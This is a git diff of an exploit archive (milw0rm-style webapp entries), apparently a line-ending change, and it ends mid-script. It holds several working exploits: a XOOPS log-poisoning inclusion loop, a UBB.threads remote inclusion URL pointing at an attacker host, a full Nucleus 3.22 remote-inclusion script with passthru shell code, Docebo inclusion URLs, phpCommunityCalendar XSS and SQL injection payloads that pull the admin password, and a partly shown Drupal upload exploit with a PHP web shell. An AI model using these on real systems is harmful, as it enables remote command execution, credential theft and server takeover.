+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../../logs/error.log",
+"../../../../../../logs/access.log",
+"../../../../../../../../../../etc/httpd/logs/acces_log",
+"../../../../../../../../../../etc/httpd/logs/acces.log",
+"../../../../../../../../../../etc/httpd/logs/error_log",
+"../../../../../../../../../../etc/httpd/logs/error.log",
+"../../../../../../../../../../var/www/logs/access_log",
+"../../../../../../../../../../var/www/logs/access.log",
+"../../../../../../../../../../usr/local/apache/logs/access_log",
+"../../../../../../../../../../usr/local/apache/logs/access.log",
+"../../../../../../../../../../var/log/apache/access_log",
+"../../../../../../../../../../var/log/apache/access.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/www/logs/error_log",
+"../../../../../../../../../../var/www/logs/error.log",
+"../../../../../../../../../../usr/local/apache/logs/error_log",
+"../../../../../../../../../../usr/local/apache/logs/error.log",
+"../../../../../../../../../../var/log/apache/error_log",
+"../../../../../../../../../../var/log/apache/error.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/log/error_log"
+);
+
+$xpl= array (
+	     "misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=",
+	     "index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]="
+	     );
+
+for ($j=0; $j<=count($xpl)-1; $j++)
+{
+  for ($i=0; $i<=count($paths)-1; $i++)
+  {
+  $a=$i+2;
+  echo "[".$a."] Trying with: ".$xpl[$j].$paths[$i]."%00\r\n";
+  $packet ="GET ".$p.$xpl[$j].$paths[$i]."%00 HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Cookie: cmd=".$cmd.";\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  #debug
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+  if (strstr($html,"*delim*"))
+    {
+      echo "Exploit succeeded...\r\n";
+      $temp=explode("*delim*",$html);
+      die($temp[1]);
+    }
+  }
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-05-21]
diff --git a/platforms/php/webapps/1814.txt b/platforms/php/webapps/1814.txt
index 1e2cae41d..305d69114 100755
--- a/platforms/php/webapps/1814.txt
+++ b/platforms/php/webapps/1814.txt
@@ -1,14 +1,14 @@
-Anomaly 1n The System presents
-UBB.threads >= 6.4.x Remote File Inclusion
- 
-founded by V4mu in 04/20/2006
-
-URL: http://www.ubbcentral.com
-Google dork: allinurl:"/ubbthreads/"
-
-exploit:
-/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
- 
-contact: irc.gigachat.net #A1TS
-
-# milw0rm.com [2006-05-22]
+Anomaly 1n The System presents
+UBB.threads >= 6.4.x Remote File Inclusion
+ 
+founded by V4mu in 04/20/2006
+
+URL: http://www.ubbcentral.com
+Google dork: allinurl:"/ubbthreads/"
+
+exploit:
+/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
+ 
+contact: irc.gigachat.net #A1TS
+
+# milw0rm.com [2006-05-22]
diff --git a/platforms/php/webapps/1816.php b/platforms/php/webapps/1816.php
index bae1c5017..80cfd5238 100755
--- a/platforms/php/webapps/1816.php
+++ b/platforms/php/webapps/1816.php
@@ -1,192 +1,192 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "Nucleus <= 3.22 arbitrary remote inclusion exploit\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";
-echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top\r\n\r\n";
-/*
-works with:
-register_globals=Om
-allow_url_fopen=Om
-*/
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to Nucleus\r\n";
-echo "location:  an arbitrary location with the code to include\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ cat ./../../config.php\r\n";
-echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / http://somehost.com/ ls -la -P1.1.1.1:80\r\n\r\n";
-echo "note, you need this code in http://somehost.com/ADMIN.php/index.html\r\n";
-echo "<?php\r\n";
-echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
-echo "ini_set(\"max_execution_time\",0);\r\n";
-echo "echo \"*delim*\";\r\n";
-echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
-echo "echo \"*delim*\";\r\n";
-echo "?>\r\n";
-die;
-}
-
-/* software site: http://nucleuscms.org/
-
-   i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49:
-
-   ...
-   global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES, $HTTP_SESSION_VARS;
-$aVarsToCheck = array('DIR_LIBS');
-foreach ($aVarsToCheck as $varName)
-{
-	if (phpversion() >= '4.1.0')
-	{
-		if (   isset($_GET[$varName])
-			|| isset($_POST[$varName])
-			|| isset($_COOKIE[$varName])
-			|| isset($_ENV[$varName])
-			|| isset($_SESSION[$varName])
-			|| isset($_FILES[$varName])
-		){
-			die('Sorry. An error occurred.');
-		}
-	} else {
-		if (   isset($HTTP_GET_VARS[$varName])
-			|| isset($HTTP_POST_VARS[$varName])
-			|| isset($HTTP_COOKIE_VARS[$varName])
-			|| isset($HTTP_ENV_VARS[$varName])
-			|| isset($HTTP_SESSION_VARS[$varName])
-			|| isset($HTTP_POST_FILES[$varName])
-		){
-			die('Sorry. An error occurred.');
-		}
-	}
-}
-
-include($DIR_LIBS . 'ADMIN.php');
-...
-
-so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote inclusion, poc:
-
-http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://somehost.com/&cmd=ls%20-la
-
-where on somehost.com we have some php code in
-
-http://somehost.com/ADMIN.php/index.html
-
-also, if register_globals = On & magic_quotes_gpc = Off:
-
-http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la
-
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-
-}
-$host=$argv[1];
-$path=$argv[2];
-$loc=urlencode($argv[3]);
-if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
-{die("Check the path, it must begin and end with a trailing slash\r\n");}
-$port=80;
-$proxy="";
-$cmd="";
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{
-$cmd.=" ".$argv[$i];
-}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$packet ="GET ".$p."nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n";
-$packet.="Host: ".$host."\r\n";
-//through cookies, it's the same, maybe can bypass some ids...
-$packet.="Cookie: GLOBALS[DIR_LIBS]=".$loc."; cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-
-if (strstr($html,"*delim*"))
-{
-  echo "Exploit succeeded...";
-  $temp=explode("*delim*",$html);
-  die("\r\n".$temp[1]."\r\n");
-}
-//if you are here...
-echo "Exploit failed...\r\n";
-?>
-
-# milw0rm.com [2006-05-23]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "Nucleus <= 3.22 arbitrary remote inclusion exploit\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";
+echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top\r\n\r\n";
+/*
+works with:
+register_globals=Om
+allow_url_fopen=Om
+*/
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to Nucleus\r\n";
+echo "location:  an arbitrary location with the code to include\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ cat ./../../config.php\r\n";
+echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / http://somehost.com/ ls -la -P1.1.1.1:80\r\n\r\n";
+echo "note, you need this code in http://somehost.com/ADMIN.php/index.html\r\n";
+echo "<?php\r\n";
+echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
+echo "ini_set(\"max_execution_time\",0);\r\n";
+echo "echo \"*delim*\";\r\n";
+echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
+echo "echo \"*delim*\";\r\n";
+echo "?>\r\n";
+die;
+}
+
+/* software site: http://nucleuscms.org/
+
+   i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49:
+
+   ...
+   global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES, $HTTP_SESSION_VARS;
+$aVarsToCheck = array('DIR_LIBS');
+foreach ($aVarsToCheck as $varName)
+{
+	if (phpversion() >= '4.1.0')
+	{
+		if (   isset($_GET[$varName])
+			|| isset($_POST[$varName])
+			|| isset($_COOKIE[$varName])
+			|| isset($_ENV[$varName])
+			|| isset($_SESSION[$varName])
+			|| isset($_FILES[$varName])
+		){
+			die('Sorry. An error occurred.');
+		}
+	} else {
+		if (   isset($HTTP_GET_VARS[$varName])
+			|| isset($HTTP_POST_VARS[$varName])
+			|| isset($HTTP_COOKIE_VARS[$varName])
+			|| isset($HTTP_ENV_VARS[$varName])
+			|| isset($HTTP_SESSION_VARS[$varName])
+			|| isset($HTTP_POST_FILES[$varName])
+		){
+			die('Sorry. An error occurred.');
+		}
+	}
+}
+
+include($DIR_LIBS . 'ADMIN.php');
+...
+
+so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote inclusion, poc:
+
+http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://somehost.com/&cmd=ls%20-la
+
+where on somehost.com we have some php code in
+
+http://somehost.com/ADMIN.php/index.html
+
+also, if register_globals = On & magic_quotes_gpc = Off:
+
+http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la
+
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+
+}
+$host=$argv[1];
+$path=$argv[2];
+$loc=urlencode($argv[3]);
+if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
+{die("Check the path, it must begin and end with a trailing slash\r\n");}
+$port=80;
+$proxy="";
+$cmd="";
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{
+$cmd.=" ".$argv[$i];
+}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$packet ="GET ".$p."nucleus/libs/PLUGINADMIN.php HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n";
+$packet.="Host: ".$host."\r\n";
+//through cookies, it's the same, maybe can bypass some ids...
+$packet.="Cookie: GLOBALS[DIR_LIBS]=".$loc."; cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+
+if (strstr($html,"*delim*"))
+{
+  echo "Exploit succeeded...";
+  $temp=explode("*delim*",$html);
+  die("\r\n".$temp[1]."\r\n");
+}
+//if you are here...
+echo "Exploit failed...\r\n";
+?>
+
+# milw0rm.com [2006-05-23]
diff --git a/platforms/php/webapps/1817.txt b/platforms/php/webapps/1817.txt
index 06067cb65..066150ac8 100755
--- a/platforms/php/webapps/1817.txt
+++ b/platforms/php/webapps/1817.txt
@@ -1,44 +1,44 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-####################################################################
-#Docebo Site: http://www.docebocms.org
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-In All scripts:
-[code]
-require_once($GLOBALS['where_framework'].'/lib/lib.permission.php');
-require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php');
-require_once($GLOBALS['where_framework'].'/lib/lib.lang.php');
-require_once($GLOBALS['where_framework'].'/lib/lib.template.php');
-require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php');
-[/code]
-
-#DoceboCMS:
-
-http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code]
-
-#DoceboKms:
-
-http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code]
-
-http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code]
-
-#DoceboLms:
-
-http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code]
-
-#DoceboCore:
-
-http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]
-
-#DoceboScs:
-
-http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code]
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-#The End ;-)
-#Pozdro Dla wszystkich o których zapomnia.em ;-)
-
-# milw0rm.com [2006-05-23]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+####################################################################
+#Docebo Site: http://www.docebocms.org
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In All scripts:
+[code]
+require_once($GLOBALS['where_framework'].'/lib/lib.permission.php');
+require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php');
+require_once($GLOBALS['where_framework'].'/lib/lib.lang.php');
+require_once($GLOBALS['where_framework'].'/lib/lib.template.php');
+require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php');
+[/code]
+
+#DoceboCMS:
+
+http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code]
+
+#DoceboKms:
+
+http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code]
+
+http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code]
+
+#DoceboLms:
+
+http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code]
+
+#DoceboCore:
+
+http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]
+
+#DoceboScs:
+
+http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+#The End ;-)
+#Pozdro Dla wszystkich o których zapomnia.em ;-)
+
+# milw0rm.com [2006-05-23]
diff --git a/platforms/php/webapps/1818.txt b/platforms/php/webapps/1818.txt
index 98e652118..7d04f0bb0 100755
--- a/platforms/php/webapps/1818.txt
+++ b/platforms/php/webapps/1818.txt
@@ -1,43 +1,43 @@
-##################################################################################
-#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<#
-##################################################################################
-#										 #
-#	 phpCommunityCalendar 4.0.3 Multiple Vulnerabilites		         #
-#										 #
-##################################################################################
-#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>#
-##################################################################################
-#										 #
-#  author      : X0r_1   							 #
-#  release     : 23.05.06							 #
-#  software    : http://www.appideas.com/	  				 #
-#  googledork  : "Calendar programming by AppIdeas.com" filetype:php   		 #
-#										 #
-##################################################################################
-
-XSS:
-
-http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script>
-
-http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script>
-
-http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><"
-
-
-SQL Injections:
-
-http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
-
-http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
-
-http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]
-
-http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]
-
-http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]
-
-http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]
-
-http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]
-
-# milw0rm.com [2006-05-23]
+##################################################################################
+#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<#
+##################################################################################
+#										 #
+#	 phpCommunityCalendar 4.0.3 Multiple Vulnerabilites		         #
+#										 #
+##################################################################################
+#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>#
+##################################################################################
+#										 #
+#  author      : X0r_1   							 #
+#  release     : 23.05.06							 #
+#  software    : http://www.appideas.com/	  				 #
+#  googledork  : "Calendar programming by AppIdeas.com" filetype:php   		 #
+#										 #
+##################################################################################
+
+XSS:
+
+http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script>
+
+http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script>
+
+http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><"
+
+
+SQL Injections:
+
+http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
+
+http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
+
+http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]
+
+http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]
+
+http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]
+
+http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]
+
+http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]
+
+# milw0rm.com [2006-05-23]
diff --git a/platforms/php/webapps/1821.php b/platforms/php/webapps/1821.php
index a2fd78e7e..7c222554f 100755
--- a/platforms/php/webapps/1821.php
+++ b/platforms/php/webapps/1821.php
@@ -1,393 +1,393 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "Drupal <= 4.7 attachment mod_mime poc exploit\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-/*
-this works with a user account with upload rights and with permissions to modify
-stories, however this is only a poc, you can do the same uploading an attachment,
-like this, with double extension, through all modules:
-
-attach.php.pps
-
-with this content:
-*/
-
-$shell=
-'<?php
-if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
-ini_set("max_execution_time",0);
-echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
-passthru($_GET[cmd]);
-echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
-?>';
-
-/*
-then:
-
-http://[target]/[path]/files/attach.php.pps?cmd=ls%20-la
-
-also, I noticed that from an admin account you can upload .php3 or .php5 files
-*/
-
-if ($argc<6) {
-echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to Drupal\r\n";
-echo "user-pass: valid credentials with upload rights\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /drupal/ user password cat ./../sites/default/settings.php\r\n";
-echo "php ".$argv[0]." localhost /drupal/ user password ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / user password ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$user=$argv[3];
-$pass=$argv[4];
-$cmd="";$port=80;$proxy="";
-
-for ($i=5; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-srand(make_seed());
-$anumber = rand(1,99999);
-
-  $data ="edit%5Bname%5D=".$user;
-  $data.="&edit%5Bpass%5D=".$pass;
-  $data.="&edit%5Bform_id%5D=user_login";
-  $data.="&op=Log%20in";
-  $packet="POST ".$path."?q=user/login&destination=node HTTP/1.0\r\n";
-  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-  $packet.="Accept-Encoding: gzip, deflate\r\n";
-  $packet.="Accept-Language: it\r\n";
-  $packet.="Referer: http://".$host.$path."\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Content-Length: ".strlen($data)."\r\n";
-  $packet.="Cache-Control: no-cache\r\n";
-  $packet.="Connection: close\r\n\r\n";
-  $packet.=$data;
-// echo quick_dump($packet);
-  sendpacketii($packet);
-  $temp=explode("Set-Cookie: ",$html);
-  $temp2=explode(" ",$temp[2]);
-  $cookie=$temp2[0];
-  echo "\r\nCookie -> ".$cookie."\r\n\r\n";
-
-
-$ext= array(".php.jpg",".php.jpeg",".php.gif", ".php.png",".php.txt",".php.html",".php.doc",".php.xls",".php.pdf",".php.ppt",".php.pps");
-
